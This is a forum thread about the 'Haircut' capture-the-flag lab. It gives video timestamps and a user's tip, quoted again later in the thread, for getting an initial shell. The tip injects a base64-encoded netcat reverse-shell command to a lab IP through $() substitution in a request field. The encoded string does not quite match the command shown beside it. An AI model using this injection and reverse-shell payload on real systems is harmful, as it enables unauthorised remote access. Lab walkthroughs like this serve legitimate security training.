Haircut Video by IppSec

01:45 - GoBuster: Discover exposed.php
04:40 - Exploiting exposed.php: Curl Argument Injection
11:40 - Getting Shell: nc, python3 to import pty.
20:09 - Screen Privesc: https://www.exploit-db.com/exploits/41154/

Saw your video, nice walkthrough, that bug with gcc where you had to modify the PATH had me scratching my head

I thought some might be interested by how I did the initial shell.
might be useful if you can’t find a web app folder where you can write

  1. base64 encode your shell command for reverse shell i.e
    echo “nc -c /bin/sh 10.10.15.152 4444” | base64
    → bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo=
  2. send request with field populated as such:
    http://localhost/test.html$($(echo bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo= |base64 -d))
  3. enjoy your shell

if | was not allowed in payload you can first write to some file in /tmp and then decode that file afterwards.

Hope some find it useful.

@sajkox said:
I thought some might be interested by how I did the initial shell.
might be useful if you can’t find a web app folder where you can write

  1. base64 encode your shell command for reverse shell i.e
    echo “nc -c /bin/sh 10.10.15.152 4444” | base64
    → bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo=
  2. send request with field populated as such:
    http://localhost/test.html$($(echo bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo= |base64 -d))
  3. enjoy your shell

if | was not allowed in payload you can first write to some file in /tmp and then decode that file afterwards.

Hope some find it useful.

Great info! Thanks for the tip.